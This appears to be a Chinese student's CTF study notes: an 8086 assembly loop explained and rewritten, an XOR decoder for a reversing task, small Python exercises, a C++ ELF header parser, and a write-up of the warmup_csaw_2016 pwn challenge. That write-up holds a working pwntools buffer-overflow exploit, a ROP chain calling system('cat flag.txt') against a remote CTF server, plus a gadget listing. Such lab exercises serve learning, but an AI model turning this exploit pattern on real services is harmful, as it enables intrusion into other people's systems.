• 汇编
func_1:
    mov ax, CCCC
    mov cx, 128
MyLoop: 
    mov [bx], ax
    add bx, 2
    loop MyLoop
    ret

func_1的作用是
将CCCC送进ax寄存器,将128送进cx寄存器

MyLoop的作用是
将ax寄存器的值CCCC送进偏移地址为bx中的值的内存单元
然后将bx的值加2(结果可能是进入下一个内存单元的地址,也就是下一个元素地址
然后在回到MyLoop将cx减一,如果cx不为0则继续重复执行以上操作
改写:

func_1:
    mov ax, CCCC
    mov cx, 128
MyLoop:
    mov [bx], ax
    add bx, 2
    sub cx,1
    cmp cx,0
    jnz MyLoop
    ret

根据xor eax, 33h猜测加密方式为异或

from pwn import *
a=[0x5b,0x54,0x52,0x5e,0x56,0x48,0x44,0x56,0x5f,0x50,0x3,0x5e,0x56,0x6c,0x47,0x3,0x6c,0x41,0x56,0x6c,0x44,0x5c,0x41,0x2,0x57,0x12,0x4e]
for i in range(len(a)):
    print(chr(a[i]^0x33),end='')



  • Python
from pwn import *
def calc(num):
    if num<1:
        return 1
    else:
        return num*calc(num-1)
tp=int(input())
print(calc(tp))
from pwn import *

def pd(a):
    for i in range(len(a)):
        if int(a[i],2)%5==0:
            print(a[i]+" ",end='')
        else:
            continue

a=input().split(",")
pd(a)

ELF解析器:

#include<bits/stdc++.h>
#include<elf.h>
using namespace std;
int scnum,sy;
signed main()
{
    printf("header:\n");
    Elf64_Ehdr e64_hd;//参见elf.h定义
    FILE *pt;//定义FILE类型的指针
    pt=freopen("babyof","r",stdin);//需要判断的文件
    fread(&e64_hd,sizeof(Elf64_Ehdr),1,pt);//从文件流读取数据到e64_hd中
    printf("Magic number and other info: ");
    for(int i=0;i<16;i++)
    {
        printf("%02x ",e64_hd.e_ident[i]);
        // cout<<e64_hd.e_ident[i];
    }
    printf("\n");
    printf("Object file type: %x\n",e64_hd.e_type);
    // cout<<"Object file type: "<<e64_hd.e_type<<endl;
    printf("Architecture: %lu\n",e64_hd.e_machine);
    // cout<<"Architecture: "<<e64_hd.e_machine<<endl;
    printf("Entry point virtual address: 0x%x\n",e64_hd.e_entry);
    printf("Program header table file offset: %d(bytes into file)\n",e64_hd.e_phoff);
    printf("Section header table file offset: %d(bytes into file)\n",e64_hd.e_shoff);
    printf("Processor-specific flags: 0x%x\n",e64_hd.e_flags);
    printf("ELF header size in bytes: %d(bytes)\n",e64_hd.e_ehsize);
    printf("Program header table entry size: %d(bytes)\n",e64_hd.e_phentsize);
    printf("Program header table entry count: %d\n",e64_hd.e_phnum);
    printf("Section header table entry size: %d(bytes)\n",e64_hd.e_shentsize);
    printf("Section header table entry count: %d\n",e64_hd.e_shnum);
    printf("Section header string table index: %d\n\n",e64_hd.e_shstrndx);
    scnum=e64_hd.e_shnum;
    sy=e64_hd.e_shstrndx;
    // section start
    printf("section:\n");
    // Elf64_Shdr *sc;//参见elf.h定义
    Elf64_Shdr sc[scnum];
    fseek(pt, e64_hd.e_shoff, SEEK_SET);//从文件开头开始偏移e64_hd.e_shoff
    fread(sc,sizeof(Elf64_Shdr)*scnum,1,pt);//从文件流读取数据到sc中
    printf("  \ttype      addr      offset    size\n");
    for(int i=0;i<scnum;i++)
    {
        printf("num:%d\t%-10x%-10x%-10x%-10d\n",i+1,sc[i].sh_type,sc[i].sh_addr,sc[i].sh_offset,sc[i].sh_size);
    }
    return 0;
}

warmup_csaw_2016_1:
此题64位保护全关,f12发现有system和cat flag.txt可以根据提示直接溢出到后门地址,也可以传参作答

from pwn import *
# context(log_level='debug',os='linux',arch='amd64',terminal=['tmux','splitw','-h'])


io=remote("node4.buuoj.cn",28711)
elf=ELF("./222")
sys_addr=elf.sym[b"system"]
# sys_addr=0x400378
# ret_addr=0x4004a1
str_flag_addr=next(elf.search(b"cat flag.txt"))
# str_flag_addr=0x400734
pop_rdi_addr=0x400713
payload=cyclic(0x48)+p64(pop_rdi_addr)+p64(str_flag_addr)+p64(sys_addr)
io.sendline(payload)
io.interactive()

# Gadgets information
# ============================================================
# 0x000000000040070c : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x000000000040070e : pop r13 ; pop r14 ; pop r15 ; ret
# 0x0000000000400710 : pop r14 ; pop r15 ; ret
# 0x0000000000400712 : pop r15 ; ret
# 0x000000000040070b : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x000000000040070f : pop rbp ; pop r14 ; pop r15 ; ret
# 0x0000000000400565 : pop rbp ; ret
# 0x0000000000400713 : pop rdi ; ret
# 0x0000000000400711 : pop rsi ; pop r15 ; ret
# 0x000000000040070d : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
# 0x00000000004004a1 : ret
# 0x0000000000400595 : ret 0xc148

# Unique gadgets found: 12